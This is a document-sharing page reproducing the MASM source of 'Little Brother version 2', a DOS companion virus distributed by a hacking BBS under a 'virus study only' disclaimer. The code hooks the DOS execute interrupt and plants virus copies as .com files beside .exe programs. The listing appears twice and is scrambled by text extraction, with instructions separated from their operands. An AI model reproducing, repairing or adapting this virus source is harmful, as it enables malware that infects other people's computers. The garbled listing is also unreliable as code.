Brother 5
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Brother 5 as PDF for free.
More details
- Words: 920
- Pages: 6
;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=; ; -=] p e r f e c t c r i m e [=; ; -=] +31.(o)79.426o79 [=; ; -=] [=; ; -=] for all your h/p/a/v files [=; ; -=] sysop: peter venkman [=; ; -=] [=; ; -=] +31.(o)79.426o79 [=; ; -=] p e r f e c t c r i m e [=; ; -=][][][][][][][][][][][][][][][=; ; ; ; *** not for general distribution *** ; ; ; ; this file is for the purpose of virus study only! it should not be passed ; ; around among the general public. it will be very useful for learning how ; ; viruses work and propagate. but anybody with access to an assembler can ; ; turn it into a working virus and anybody with a bit of assembly coding ; ; experience can turn it into a far more malevolent program than it already ; ; is. keep this code in responsible hands! ; ; ; ;****************************************************************************; ;**************************************************************************** ;* little brother version 2 ;* ;* compile with masm 4.0 ;* (other assemblers will probably not produce the same result) ;* ;* disclaimer: ;* this file is only for educational purposes. the author takes no ;* responsibility for anything anyone does with this file. do not ;* modify this file! ;**************************************************************************** cseg
filelen respar version_ oi21 nameptr dta
segment assume cs:cseg,ds:cseg,es:nothing .radix
16
equ equ equ equ equ equ
end_ - begin (filelen/16d) + 17d 2 end_ end_+4 end_+8
;**************************************************************************** ;* install the program! ;**************************************************************************** org begin:
100h
cld mov mov
ax,0044h es,ax
;move program to empty hole
rep
cancel:
mov mov mov movsb
di,0100h si,di cx,filelen
mov mov mov mov lodsw cmp je stosw movsw
ds,cx si,0084h di,offset oi21 dx,offset ni21
;get original int21 vector
ax,dx cancel
;already installed?
push pop mov int
es ds ax,2521h 21h
;set vector to new handler
ret
;**************************************************************************** ;* file-extensions ;**************************************************************************** exe_txt com_txt
db db
'exe',0 'com',0
;**************************************************************************** ;* interupt handler 24 ;**************************************************************************** ni24:
mov iret
al,03
;**************************************************************************** ;* interupt handler 21 ;**************************************************************************** ni21:
pushf push push push push push
dx bx ax ds es
cmp jne
ax,4b00h exit
doit:
call
infect
exit:
pop pop pop
es ds ax
;execute ?
pop pop popf
bx dx
jmp
dword ptr cs:[oi21]
;call to old int-handler
;**************************************************************************** ;* tries to infect the file (ptr to asciiz-name is ds:dx) ;**************************************************************************** infect:
cld
rep
rep do_exe:
mov mov
word ptr cs:[nameptr],dx ;save the ptr to the filename word ptr cs:[nameptr+2],ds
mov int push push
ah,2fh 21 es bx
;get old dta
push pop mov mov int
cs ds dx,offset dta ah,1ah 21
;set new dta
call push mov mov cmpsb pop jz
searchpoint di si,offset com_txt cx,3
mov mov cmpsb jnz
si,offset exe_txt cl,3
mov call
si,offset com_txt change_ext
;change extension to com
mov int push
ax,3300h 21 dx
;get ctrl-break flag
cwd inc push int
ax ax 21
mov int push push
ax,3524h 21 bx es
;get int24 vector
push
cs
;set int24 vec to new handler
;is extension 'com'?
di do_com ;is extension 'exe'?
return
;clear the flag
return1:
return:
pop mov mov push int
ds dx,offset ni24 ah,25h ax 21
lds xor mov int jc xchg
dx,dword ptr [nameptr] cx,cx ah,5bh 21 return1 bx,ax
push pop mov mov mov int cmp pushf
cs ds cx,filelen dx,offset begin ah,40h 21 ax,cx
mov int
ah,3eh 21
;close the file
popf jz
return1
;all bytes written?
lds mov int
dx,dword ptr [nameptr] ah,41h 21
;no, delete the virus
pop pop pop int
ax ds dx 21
;restore int24 vector
pop pop int
ax dx 21
;restore ctrl-break flag
mov call
si,offset exe_txt change_ext
;change extension to exe ;execute exe-file
mov pop pop int
ah,1ah dx ds 21
;restore old dta
;create the virus (unique name)
;save handle
;write the virus
ret do_com:
call cmp jne mov call call jnc
findfirst ;is the com-file a virus? word ptr cs:[dta+1ah],filelen return ;no, execute com-file si,offset exe_txt ;does the exe-variant exist? change_ext findfirst return ;yes, execute exe-file
mov call jmp
si,offset com_txt change_ext short return
;change extension to com ;execute com-file
;**************************************************************************** ;* find the file ;**************************************************************************** findfirst:
lds mov mov int ret
dx,dword ptr [nameptr] cl,27h ah,4eh 21
;**************************************************************************** ;* change the extension of the filename (cs:si -> ext) ;**************************************************************************** change_ext:
call push pop movsw movsw ret
searchpoint cs ds
;**************************************************************************** ;* search begin of extension ;**************************************************************************** searchpoint: repnz
les mov mov scasb sub ret
di,dword ptr cs:[nameptr] ch,0ffh al,0 di,4
;**************************************************************************** ;* text and signature ;**************************************************************************** db
'little brother',0
ends end
begin
end_: cseg
;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=; ; -=] p e r f e c t c r i m e [=; ; -=] +31.(o)79.426o79 [=; ; -=] [=; ; -=] for all your h/p/a/v files [=;
; -=] sysop: peter venkman [=; ; -=] [=; ; -=] +31.(o)79.426o79 [=; ; -=] p e r f e c t c r i m e [=; ; -=][][][][][][][][][][][][][][][=; ; ; ; *** not for general distribution *** ; ; ; ; this file is for the purpose of virus study only! it should not be passed ; ; around among the general public. it will be very useful for learning how ; ; viruses work and propagate. but anybody with access to an assembler can ; ; turn it into a working virus and anybody with a bit of assembly coding ; ; experience can turn it into a far more malevolent program than it already ; ; is. keep this code in responsible hands! ; ; ; ;****************************************************************************;
filelen respar version_ oi21 nameptr dta
segment assume cs:cseg,ds:cseg,es:nothing .radix
16
equ equ equ equ equ equ
end_ - begin (filelen/16d) + 17d 2 end_ end_+4 end_+8
;**************************************************************************** ;* install the program! ;**************************************************************************** org begin:
100h
cld mov mov
ax,0044h es,ax
;move program to empty hole
rep
cancel:
mov mov mov movsb
di,0100h si,di cx,filelen
mov mov mov mov lodsw cmp je stosw movsw
ds,cx si,0084h di,offset oi21 dx,offset ni21
;get original int21 vector
ax,dx cancel
;already installed?
push pop mov int
es ds ax,2521h 21h
;set vector to new handler
ret
;**************************************************************************** ;* file-extensions ;**************************************************************************** exe_txt com_txt
db db
'exe',0 'com',0
;**************************************************************************** ;* interupt handler 24 ;**************************************************************************** ni24:
mov iret
al,03
;**************************************************************************** ;* interupt handler 21 ;**************************************************************************** ni21:
pushf push push push push push
dx bx ax ds es
cmp jne
ax,4b00h exit
doit:
call
infect
exit:
pop pop pop
es ds ax
;execute ?
pop pop popf
bx dx
jmp
dword ptr cs:[oi21]
;call to old int-handler
;**************************************************************************** ;* tries to infect the file (ptr to asciiz-name is ds:dx) ;**************************************************************************** infect:
cld
rep
rep do_exe:
mov mov
word ptr cs:[nameptr],dx ;save the ptr to the filename word ptr cs:[nameptr+2],ds
mov int push push
ah,2fh 21 es bx
;get old dta
push pop mov mov int
cs ds dx,offset dta ah,1ah 21
;set new dta
call push mov mov cmpsb pop jz
searchpoint di si,offset com_txt cx,3
mov mov cmpsb jnz
si,offset exe_txt cl,3
mov call
si,offset com_txt change_ext
;change extension to com
mov int push
ax,3300h 21 dx
;get ctrl-break flag
cwd inc push int
ax ax 21
mov int push push
ax,3524h 21 bx es
;get int24 vector
push
cs
;set int24 vec to new handler
;is extension 'com'?
di do_com ;is extension 'exe'?
return
;clear the flag
return1:
return:
pop mov mov push int
ds dx,offset ni24 ah,25h ax 21
lds xor mov int jc xchg
dx,dword ptr [nameptr] cx,cx ah,5bh 21 return1 bx,ax
push pop mov mov mov int cmp pushf
cs ds cx,filelen dx,offset begin ah,40h 21 ax,cx
mov int
ah,3eh 21
;close the file
popf jz
return1
;all bytes written?
lds mov int
dx,dword ptr [nameptr] ah,41h 21
;no, delete the virus
pop pop pop int
ax ds dx 21
;restore int24 vector
pop pop int
ax dx 21
;restore ctrl-break flag
mov call
si,offset exe_txt change_ext
;change extension to exe ;execute exe-file
mov pop pop int
ah,1ah dx ds 21
;restore old dta
;create the virus (unique name)
;save handle
;write the virus
ret do_com:
call cmp jne mov call call jnc
findfirst ;is the com-file a virus? word ptr cs:[dta+1ah],filelen return ;no, execute com-file si,offset exe_txt ;does the exe-variant exist? change_ext findfirst return ;yes, execute exe-file
mov call jmp
si,offset com_txt change_ext short return
;change extension to com ;execute com-file
;**************************************************************************** ;* find the file ;**************************************************************************** findfirst:
lds mov mov int ret
dx,dword ptr [nameptr] cl,27h ah,4eh 21
;**************************************************************************** ;* change the extension of the filename (cs:si -> ext) ;**************************************************************************** change_ext:
call push pop movsw movsw ret
searchpoint cs ds
;**************************************************************************** ;* search begin of extension ;**************************************************************************** searchpoint: repnz
les mov mov scasb sub ret
di,dword ptr cs:[nameptr] ch,0ffh al,0 di,4
;**************************************************************************** ;* text and signature ;**************************************************************************** db
'little brother',0
ends end
begin
end_: cseg
;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=; ; -=] p e r f e c t c r i m e [=; ; -=] +31.(o)79.426o79 [=; ; -=] [=; ; -=] for all your h/p/a/v files [=;
; -=] sysop: peter venkman [=; ; -=] [=; ; -=] +31.(o)79.426o79 [=; ; -=] p e r f e c t c r i m e [=; ; -=][][][][][][][][][][][][][][][=; ; ; ; *** not for general distribution *** ; ; ; ; this file is for the purpose of virus study only! it should not be passed ; ; around among the general public. it will be very useful for learning how ; ; viruses work and propagate. but anybody with access to an assembler can ; ; turn it into a working virus and anybody with a bit of assembly coding ; ; experience can turn it into a far more malevolent program than it already ; ; is. keep this code in responsible hands! ; ; ; ;****************************************************************************;
Related Documents
Brother 5
November 2019 34
Brother
October 2019 56
Brother
April 2020 24
Brother Jacob
November 2019 40
Big Brother
June 2020 21